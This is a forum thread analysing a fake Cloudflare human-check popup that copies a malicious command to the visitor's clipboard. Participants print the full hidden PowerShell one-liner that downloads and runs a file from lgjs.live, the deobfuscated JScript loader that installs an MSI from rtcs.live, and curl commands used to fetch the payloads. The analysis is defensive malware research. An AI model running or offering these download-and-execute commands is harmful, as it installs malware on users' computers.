Fake cloudflare?

amal · April 7, 2025, 7:16pm

Holy shit I just went to check out https://bilconference.com/ to see what it was about and I got this “cloudflare” pop-up to check that I was human, but I’m sure it’s fake and it’s actually a virus that has infected the site because it want’s me to literally run a powershell script that downloads stuff and executes it on my computer.

This is what is copied to the clipboard and what it wants me to execute;

cmd /c start /min powershell -w hidden -c "$f=Join-Path $env:TEMP 'ka.txt';curl.exe -s 'https://lgjs.live/z/' -o $f;$w=New-Object -ComObject WScript.Shell;$w.Run('cscript.exe //E:jscript "'+$f+'"',0,$false)" #  ✔ ''Cloud Identificator: 5489''

The ka.txt file it silently downloads and executes with a javascript processor once this command is run is as follows…

ka.txt (455.8 KB)

Insanity but I’m 100% certain a ton of people just follow the instructions and fuck themselves. Holy shit.

StarGate01 · April 7, 2025, 11:21pm

Seems to be a loader. https://obf-io.deobfuscate.io/ deobfuscates this code into (The names appear to be randomly generated from a wordlist):

function func_OnePlus75() {}
func_OnePlus75();
function func_Palantir_usage07(arg_Splunk37) {}
try {
  function func_LG46() {}
  func_LG46();
  var boosterx = {
    gmarket: "UILEVEL",
    assword: "https://rtcs.live/ds.php",
    p: "InstallProduct"
  };
  function func_LinkedIn69() {}
  func_LinkedIn69();
  var adsvery = new ActiveXObject("WindowsInstaller.Installer");
  function func_Qualcomm53() {}
  func_Qualcomm53();
  adsvery.UILEVEL = 2;
  function func_VMware13() {}
  func_VMware13();
  adsvery.InstallProduct("https://rtcs.live/ds.php", "");
  function func_Robinhood40() {}
  func_Robinhood40();
} catch (p) {
  console.error("Keys market LOW", p);
}
function func_traceid_container58() {}
func_traceid_container58();
function func_packetloss_monitor79(arg_token26) {}
{
  "9781328";
}

If you remove all dead code this gives a single ActiveX call:

var adsvery = new ActiveXObject("WindowsInstaller.Installer");
adsvery.UILEVEL = 2;
adsvery.InstallProduct("https://rtcs.live/ds.php", "");

You can confirm the decompiler generated the correct URL by running the code in a non-vulnerable engine (e.g. V8) and stubbing the ActiveX implementation like this:

window.ActiveXObject = function() { return { "InstallProduct" : function(a, b) { console.log(a); } } }

The malicious code tries to use an old Internet Explorer API (the old one, not the modern Chromium Edge) to instanciate a Windows COM object via the ActiveX API, which then is supposed to give access to the Windows Installer infrastructure. This Installer is then invoked to install a (probably malicious) package from the URL specified. Don’t be confused though, this script is not running in a Browser - but instead in the Windows JavaScript host (cscript.exe //E:jscript), a runtime where is ActiveX API is supported.

I suppose this is all some kind of elaborate obfuscation to evade virus detection programs.

StarGate01 · April 8, 2025, 2:01am

Well, however wrote this virus is incompetent - the msiexec payload does not even properly execute because the URL does not properly serve the download. Neither on Windows, nor on Linux (curl --http1.1 -4 -v "https://rtcs.live/ds.php" -H "Connection: Keep-Alive" -H "Accept: */*" -H "User-Agent: Windows Installer" -o virus.msi) . Although I did observe a HTTP 403 Forbidden response when coming from Germany, and a HTTP 404 Not Found when coming from Romania or Brazil, which makes me think there is some additional check (or actual real CloudFlare fronting) going on regarding to where the payload is served.

Anyway, the original URL (https://bilconference.com/) does not even attempt to infect me, nor serve the popup. Maybe some geoblocking is going on (see above) , I even faked my user agent. In any case, you might want to check your browser for malicious add-ons.

amal · April 8, 2025, 3:51am

I had to modify the curl command and it did download a payload.

Apparently it’s this;

It can also selectively activate based on whether the client (visitor) fits a criteria

StarGate01 · April 8, 2025, 7:03am

Oh interesting, which curl command ended up working?

ODaily · April 8, 2025, 3:17pm

I love the enthusiasm, but I can’t stress this enough, DO. NOT. FIX. THE. BROKEN. VIRUS.

invalid_signal · April 8, 2025, 6:01pm

Sharing a broken virus to a group like DT forum members will probably lead to fixing it, but replacing the payload with a rick roll vid.

ODaily · April 8, 2025, 6:02pm

My first thought was, why not replace the virus with something to gently mock and educate the person(s) who fell for it? So, yeah.

enginerd · April 8, 2025, 7:34pm

What’s wrong with us hackers being curious about these things?

caj380 · April 8, 2025, 7:39pm

a-group-of-men-are-sitting-at-a-bar-talking-to-each-other-and-one-man-is-dancing

ODaily · April 8, 2025, 7:59pm

Curiosity is great!
Just don’t lick the light socket in the process.

amal · April 8, 2025, 8:30pm

From my original post I extracted the curl command which was;

curl.exe -s 'https://lgjs.live/z/' -o $f

But, being on Windows, the single quotes did not work, so I simply removed the quotes all together and the $f at the end;

curl.exe -s https://lgjs.live/z/ -o ka.txt

StarGate01 · April 8, 2025, 9:50pm

Ah, I see. I thought you had figured out how do download the actual second stage MSI payload, but it might be better for it to be unavailable anyway

But yes. Studying these things helps us to better protect us in the future.